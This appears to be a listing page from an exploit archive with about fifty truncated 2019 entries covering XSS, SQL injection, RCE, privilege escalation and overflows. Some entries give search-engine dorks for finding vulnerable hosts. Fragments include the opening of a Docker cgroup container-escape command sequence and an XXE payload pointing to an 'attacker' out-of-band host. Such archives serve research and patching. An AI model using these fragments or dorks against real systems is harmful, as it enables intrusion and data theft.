macOS / iOS NSKeyedUnarchiver - Use-After-Free of ObjC Objects when Unarchiving OITSUIntDictionary Instances

When deserializing NSObjects with the NSArchiver API 1, one can supply a whitelist of classes that are allowed to be unarchived. In that case, any object in the archive whose class is not whitelisted will not be deserialized. Doing so will also cause the NSKeyedUnarchiver to "requireSecureCoding"...

macOS / iOS JavaScriptCore - Loop-Invariant Code Motion (LICM) Leaves Object Property Access Unguarded

While fuzzing JavaScriptCore, I encountered the following modified and commented JavaScript program which crashes jsc from current HEAD and release /System/Library/Frameworks/JavaScriptCore.framework/Resources/jsc: function v2trigger // Force JIT compilation. for let v7 = 0; v7 1000000; v7++ if...

macOS / iOS JavaScriptCore - JSValue Use-After-Free in ValueProfiles

While fuzzing JSC, I encountered the following JS program which crashes JSC from current HEAD and release /System/Library/Frameworks/JavaScriptCore.framework/Resources/jsc: // Run with --useConcurrentJIT=false --thresholdForJITAfterWarmUp=10 function fullGC for var i = 0; i 10; i++ new...

Amcrest Cameras 2.520.AC00.18.R - Unauthenticated Audio Streaming

Exploit Title: Unauthenticated Audio Streaming from Amcrest Camera Shodan Dork: html:"@WebVersion@" Date: 08/29/2019 Exploit Author: Jacob Baines Vendor Homepage: https://amcrest.com/ Software Link: https://amcrest.com/firmwaredownloads Affected Version: V2.520.AC00.18.R Fixed Version:...

WordPress Theme Real Estate 2.8.9 - Cross-Site Scripting

Exploit Title: Real Estate 7 - Real Estate WordPress Theme v2.8.9 Persistent XSS Injection Google Dork: inurl:"/wp-content/themes/realestate-7/" Date: 2019/07/20 Author: m0ze Vendor Homepage: https://contempothemes.com Software Link:...

WordPress Plugin Simple Membership 3.8.4 - Cross-Site Request Forgery

Exploit Title: Cross Site Request Forgery in Wordpress Simple Membership plugin Date: 2019-07-27 Exploit Author: rubyman Vendor Homepage: https://wordpress.org/plugins/simple-membership/ wpvulndb : https://wpvulndb.com/vulnerabilities/9482 Version: 3.8.4 Tested on: Windows 8.1 CVE : CVE-2019-1432...

GigToDo 1.3 - Cross-Site Scripting

Exploit Title: GigToDo - Freelance Marketplace Script v1.3 Persistent XSS Injection Google Dork: - Date: 2019/07/28 Author: m0ze Vendor Homepage: https://www.gigtodoscript.com Software Link: https://codecanyon.net/item/gigtodo-freelance-marketplace-script/23855397 Version: = 1.3 Tested on:...

WordPress Plugin Database Backup < 5.2 - Remote Code Execution (Metasploit)

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'WP Database Backup RCE', 'Description' = %q There exists a command injection vulnerability in the Wordpress plugin wp-database-backup for version...

Schneider Electric Pelco Endura NET55XX Encoder - Authentication Bypass (Metasploit)

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule "Schneider Electric Pelco Endura NET55XX Encoder", 'Description' = %q This module exploits inadequate access controls within the webUI to enable t...

Microsoft Windows 7 build 7601 (x86) - Local Privilege Escalation

include include / EDB Note: Download https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47176.zip / / PREPROCESSOR DEFINITIONS / define MNSELECTITEM 0x1E5 define MNSELECTFIRSTVALIDITEM 0x1E7 define MNOPENHIERARCHY 0x01E3 define MNCANCELMENUS 0x1E6 define MNBUTTONDOWN...

Ahsay Backup 7.x - 8.1.1.50 - XML External Entity Injection

Unauthenticated XML External Entity XXE in Ahsay Backup v7.x - v8.1.0.50. Date: 26-6-2019 Exploit Author: Wietse Boonstra Vendor Homepage: https://ahsay.com Software Link: http://ahsay-dn.ahsay.com/v8/81050/cbs-win.exe Version: 7.x %remote;%intern; %trick; On http://attacker/oob add the following...

Moodle Filepicker 3.5.2 - Server Side Request Forgery

Exploit Title: Server Side Request Forgery in Moodle Filepicker Google Dork: / Date: 2019-07-25 Exploit Author: Fabian Mosch & Nick Theisinger r-tec IT Security GmbH Vendor Homepage: https://moodle.org/ Software Link: https://github.com/moodle/moodle Version: Moodle Versions 3.4, 3.3, 3.3.3, 3.2 ...

pdfresurrect 0.15 - Buffer Overflow

Exploit Title: pdfresurrect 0.15 Buffer Overflow Date: 2019-07-26 Exploit Author: j0lama Vendor Homepage: https://github.com/enferex/pdfresurrect Software Link: https://github.com/enferex/pdfresurrect Version: 0.15 Tested on: Ubuntu 18.04 CVE : CVE-2019-14267 Description =========== PDFResurrect...

Ahsay Backup 7.x - 8.1.1.50 - Authenticated Arbitrary File Upload / Remote Code Execution (Metasploit)

Exploit Title: Authenticated insecure file upload and code execution flaw in Ahsay Backup v7.x - v8.1.1.50. Metasploit Date: 26-6-2019 Exploit Author: Wietse Boonstra Vendor Homepage: https://ahsay.com Software Link: http://ahsay-dn.ahsay.com/v8/81150/cbs-win.exe Version: 7.x 'Ahsay Backup...

Ahsay Backup 8.1.1.50 - Insecure File Upload and Code Execution (Authenticated)

Exploit Title: Ahsay Backup 8.1.1.50 - Insecure File Upload and Code Execution Authenticated Date: 26-6-2019 Exploit Author: Wietse Boonstra Vendor Homepage: https://ahsay.com Software Link: http://ahsay-dn.ahsay.com/v8/81150/cbs-win.exe Version: 7.x 8.1.1.50 Tested on: Windows / Linux CVE :...

Ovidentia 8.4.3 - SQL Injection

------------------------------------------------------- Exploit Title: Ovidentia CMS - SQL Injection Authenticated Date: 06/05/2019 CVE: CVE-2019-13978 Exploit Author: Fernando Pinheiro n3k00n3 Victor Flores UserX Vendor Homepage: https://www.ovidentia.org/ Version: 8.4.3 Tested on: Mac,linux -...

WebKit - Universal Cross-Site Scripting due to Synchronous Page Loads

BACKGROUND As lokihardt@ has demonstrated in https://bugs.chromium.org/p/project-zero/issues/detail?id=1121, WebKit's support of the obsolete showModalDialog method gives an attacker the ability to perform synchronous cross-origin page loads. In certain conditions, this might lead to...

Ovidentia 8.4.3 - Cross-Site Scripting

------------------------------------------------------- Exploit Title: Ovidentia CMS - XSS Ovidentia 8.4.3 Description: The vulnerability permits any kind of XSS attacks. Reflected, DOM and Stored XSS. Date: 06/05/2019 CVE: CVE-2019-13977 Exploit Author: Fernando Pinheiro n3k00n3 Victor Flores...

MyBB < 1.8.21 - Remote Code Execution

/ Exploit Title: MyBB 1.8.21 Authenticated RCE Date: July 24, 2019 Exploit Author: Giovanni Chhatta https://www.linkedin.com/in/giovannichhatta/ Vendor Homepage: https://mybb.com/ Software Link: https://resources.mybb.com/downloads/mybb1820.zip Version: 1.8.20 Tested on: Windows 10 Blog:...

Apple iMessage - DigitalTouch tap Message Processing Out-of-Bounds Read

The digital touch iMessage extension can read out of bounds if a malformed Tap message contains a color array that is shorter than the points array and delta array. The method ETTapMessage initWithArchiveData: checks that the points array is twice as long as the deltas array, but only checks that...

NoviSmart CMS - SQL injection

Exploit Title: NoviSmart CMS SQL injection Date: 23.7.2019. Exploit Author: n1x MS-WEB Vendor Homepage: http://www.novismart.com/ Version: Every version CVE : CWE-89 Vulnerable parameter: Referer HTTP Header field GET Request GET / HTTP/1.1 Referer:...

Cisco Wireless Controller 3.6.10E - Cross-Site Request Forgery

Product : Cisco Wireless Controller Version : 3.6.10E last version Date: 23.07.2019 Vendor Homepage: https://www.cisco.com Exploit Author: Mehmet Önder Key Website: htts://cloudvist.com CVE: CVE-2019-12624 Description : The application interface allows users to perform certain actions via HTTP...

Linux Kernel 4.10 < 5.1.17 - 'PTRACE_TRACEME' pkexec Local Privilege Escalation

// Linux 4.10 // - added known helper paths // - added search for suitable helpers // - added automatic targeting // - changed target suid exectuable from passwd to pkexec // https://github.com/bcoles/kernel-exploits/tree/master/CVE-2019-13272 // --- // Tested on: // - Ubuntu 16.04.5 kernel...

WordPress Plugin Hybrid Composer 1.4.6 - Improper Access Restrictions

Exploit Title: Wordpress Hybrid Composer = 1.4.6 - Unauthenticated Configuration Access Admin Takeover Date: 2019-07-24 Vendor Homepage: http://wordpress.framework-y.com Software Link: http://wordpress.framework-y.com/hybrid-composer/ Reference:...

Android 7 < 9 - Remote Code Execution

Exploit Title: Android 7-9 - Remote Code Execution Date: date Exploit Author: Marcin Kozlowski Version: 7-9 Tested on: Android CVE : 2019-2107 CVE-2019-2107 - looks scary. Still remember Stagefright and PNG bugs vulns .... With CVE-2019-2107 the decoder/codec runs under mediacodec user and with...

Trend Micro Deep Discovery Inspector IDS - Security Bypass

Credits: John Page aka hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/TREND-MICRO-DEEP-DISCOVERY-INSPECTOR-PERCENT-ENCODING-IDS-BYPASS.txt + ISR: Apparition Security Vendor www.trendmicro.com Product Deep Discovery Inspector Deep Discovery...

Axway SecureTransport 5 - Unauthenticated XML Injection

Title: Axway SecureTransport 5 - Unauthenticated XML Injection Google Dork: intitle:"Axway SecureTransport" "Login" Date: 2019-07-20 Author: Dominik Penner / zer0pwn of Underdog Security Vendor Homepage: https://www.axway.com/en Software Link:...

BACnet Stack 0.8.6 - Denial of Service

Exploit Title: BACnet Stack 0.8.6 - Denial of Service Google Dork: if applicable Date: 2019-07-19 Exploit Author: mmorillo Vendor Homepage: https://sourceforge.net/p/bacnet/ Software Link: https://sourceforge.net/projects/bacnet/files/bacnet-stack/bacnet-stack-0.8.6/ Version: bacnet-stack-0.8.6...

Comtrend-AR-5310 - Restricted Shell Escape

Exploit Title: Comtrend-AR-5310 - Restricted Shell Escape Date: 2019-07-20 Exploit Author: AMRI Amine Vendor Homepage: https://www.comtrend.com/ Version: GE31-412SSG-C01R10.A2pG039u.d24k Tested on: Linux busybox TL;DR: A local user can bypass the restricted shell using the command substitution...

Docker - Container Escape

On the host docker run --rm -it --cap-add=SYSADMIN --security-opt apparmor=unconfined ubuntu bash In the container mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x echo 1 /tmp/cgrp/x/notifyonrelease hostpath=sed -n 's/.\perdir=^,./\1/p' /etc/mtab echo...

Web Ofisi Firma 13 - 'oz' SQL Injection

Exploit Title: Web Ofisi Firma 13 - 'oz' SQL Injection Date: 2019-07-19 Exploit Author: Ahmet Ümit BAYRAM Vendor: https://www.web-ofisi.com/detay/kurumsal-firma-v13-sinirsiz-dil.html Demo Site: http://demobul.net/firmav13/ Version: v13 Tested on: Kali Linux CVE: N/A ----- PoC: SQLi ----- Request:...

Web Ofisi Firma Rehberi 1 - 'il' SQL Injection

Exploit Title: Web Ofisi Firma Rehberi 1 - 'il' SQL Injection Date: 2019-07-19 Exploit Author: Ahmet Ümit BAYRAM Vendor: https://www.web-ofisi.com/detay/firma-rehberi-scripti-v1.html Demo Site: http://demobul.net/firma-rehberi-v1/ Version: v1 Tested on: Kali Linux CVE: N/A ----- PoC: SQLi -----...

Web Ofisi Emlak 2 - 'ara' SQL Injection

Exploit Title: Web Ofisi Emlak 2 - 'ara' SQL Injection Date: 2019-07-19 Exploit Author: Ahmet Ümit BAYRAM Vendor: https://www.web-ofisi.com/detay/emlak-scripti-v2.html Demo Site: http://demobul.net/emlakv2/ Version: v2 Tested on: Kali Linux CVE: N/A ----- PoC: SQLi ----- Request:...

Web Ofisi E-Ticaret 3 - 'a' SQL Injection

Exploit Title: Web Ofisi E-Ticaret 3 - 'a' SQL Injection Date: 2019-07-19 Exploit Author: Ahmet Ümit BAYRAM Vendor: https://www.web-ofisi.com/detay/e-ticaret-v3-sanal-pos.html Demo Site: http://demobul.net/eticaretv3/ Version: v3 Tested on: Kali Linux CVE: N/A ----- PoC: SQLi ----- Request:...

MAPLE Computer WBT SNMP Administrator 2.0.195.15 - Remote Buffer Overflow (EggHunter)

Exploit Title: MAPLE Computer WBT SNMP Administrator 2.0.195.15 - Remote Buffer Overflow EggHunter Author: sasaga92 Discovery Date: 2019-07-18 Vendor Homepage: www.computerlab.com Software Link: https://www.computerlab.com/index.php/downloads/category/27-device-manager Software Link:...

REDCap < 9.1.2 - Cross-Site Scripting

Exploit Title: REDCap - Details: Since it is an onkeypress event, it is triggered whenever the user touch any key and since the XSS payload is stored in the project name it appears in several pages. - Privileges: It requires admin privileges to store it. - Location example:...

Web Ofisi Rent a Car 3 - 'klima' SQL Injection

Exploit Title: Web Ofisi Rent a Car 3 - 'klima' SQL Injection Date: 2019-07-19 Exploit Author: Ahmet Ümit BAYRAM Vendor: https://www.web-ofisi.com/detay/rent-a-car-v3.html Demo Site: http://demobul.net/rentacarv3/ Version: v3 Tested on: Kali Linux CVE: N/A ----- PoC 1: SQLi ----- Request:...

Web Ofisi Emlak 3 - 'emlak_durumu' SQL Injection

Exploit Title: Web Ofisi Emlak 3 - 'emlakdurumu' SQL Injection Date: 2019-07-19 Exploit Author: Ahmet Ümit BAYRAM Vendor: https://www.web-ofisi.com/detay/emlak-scripti-v3.html Demo Site: http://demobul.net/emlakv3/ Version: V2 Tested on: Kali Linux CVE: N/A ----- PoC 1: SQLi ----- Request:...

Web Ofisi Platinum E-Ticaret 5 - 'q' SQL Injection

Exploit Title: Web Ofisi Platinum E-Ticaret 5 - 'q' SQL Injection Date: 2019-07-19 Exploit Author: Ahmet Ümit BAYRAM Vendor: https://www.web-ofisi.com/detay/platinum-e-ticaret-v5.html Demo Site: http://demobul.net/eticaretv5/ Version: v5 Tested on: Kali Linux CVE: N/A ----- PoC 1: SQLi -----...

fuel CMS 1.4.1 - Remote Code Execution (1)

Exploit Title: fuel CMS 1.4.1 - Remote Code Execution 1 Date: 2019-07-19 Exploit Author: 0xd0ff9 Vendor Homepage: https://www.getfuelcms.com/ Software Link: https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1 Version: = 0 and n 1: start = haystack.findneedle, start+1 n -= 1 return start...

WordPress Plugin OneSignal 1.17.5 - 'subdomain' Persistent Cross-Site Scripting

Exploit Title: WordPress Plugin OneSignal 1.17.5 - Persistent Cross-Site Scripting Date: 2019-07-18 Vendor Homepage: https://www.onesignal.com Software Link: https://wordpress.org/plugins/onesignal-free-web-push-notifications/ Affected version: 1.17.5 Exploit Author: LiquidWorm Tested on: Linux...

Microsoft Windows 10 1903/1809 - RPCSS Activation Kernel Security Callback Privilege Escalation

Windows: RPCSS Activation Kernel Security Callback EoP Platform: Windows 10 1903/1809 not tested earlier Class: Elevation of Privilege Security Boundary per Windows Security Service Criteria: User boundary Summary: The RPCSS Activation Kernel RPC server’s security callback can be bypassed resulti...

WinMPG iPod Convert 3.0 - 'Register' Denial of Service

Exploit Title: WinMPG iPod Convert 3.0 - 'Register' Denial of Service Date: 2019-07-16 Vendor Homepage:http://www.winmpg.com Software Link: https://www.techspot.com/downloads/downloadnow/6192/?evp=d62142990e9320a4e811b283fdcc4060&file= Exploit Author: stresser Tested Version: 3.0 Tested on: Windo...

Microsoft Windows - NtUserSetWindowFNID Win32k User Callback Privilege Escalation (Metasploit)

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Windows NtUserSetWindowFNID Win32k User Callback', 'Description' = %q An elevation of privilege vulnerability exists in Windows when the Win32k...

Oracle Siebel CRM 19.0 - Persistent Cross-Site Scripting

Exploit Title: Oracle Siebel CRM 19.0 - Persistent Cross-Site Scripting Date: 2019-07-17 Exploit Author: Sarath Nair aka AceNeon13 Contact: @AceNeon13 Vendor Homepage: www.oracle.com Software Link: https://www.oracle.com/applications/siebel/ Version: Siebel CRM UI Framework Version 19.0 and prior...

MAPLE Computer WBT SNMP Administrator 2.0.195.15 - Remote Buffer Overflow

Exploit Title: MAPLE Computer WBT SNMP Administrator 2.0.195.15 - Remote Buffer Overflow Author: hyp3rlinx Discovery Date: 2019-07-17 Vendor Homepage: www.computerlab.com Software Link: https://www.computerlab.com/index.php/downloads/category/27-device-manager Software Link:...

Linux - Broken Permission and Object Lifetime Handling for PTRACE_TRACEME

== Summary == This bug report describes two issues introduced by commit 64b875f7ac8a "ptrace: Capture the ptracer's creds not PTPTRACECAP", introduced in v4.10 but also stable-backported to older versions. I will send a suggested patch in a minute "ptrace: Fix -ptracercred handling for...

PHP Laravel Framework 5.5.40 / 5.6.x < 5.6.30 - token Unserialize Remote Command Execution (Metasploit)

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'PHP Laravel Framework token Unserialize Remote Command Execution', 'Description' = %q This module exploits a vulnerability in the PHP Laravel...

DameWare Remote Support 12.0.0.509 - 'Host' Buffer Overflow (SEH)

!/usr/bin/env python Author: Xavi Beltran Date: 11/07/2019 Description: SEH based Buffer Overflow DameWare Remote Support V. 12.0.0.509 CVE-2018-12897 Contact: [email protected] Webpage: https://xavibel.com Tested on: Windows XP SP3 ESP Credit for Adam Jeffreys from Nettitude! : Usage:...

Microsoft Compiled HTML Help / Uncompiled .chm File - XML External Entity Injection

Credits: John Page aka hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-HTML-HELP-UNCOMPILED-CHM-FILE-XML-EXTERNAL-ENTITY-INJECTION.txt + ISR: ApparitionSec Vendor www.microsoft.com Product Microsoft Compiled HTML Help "hh.exe"...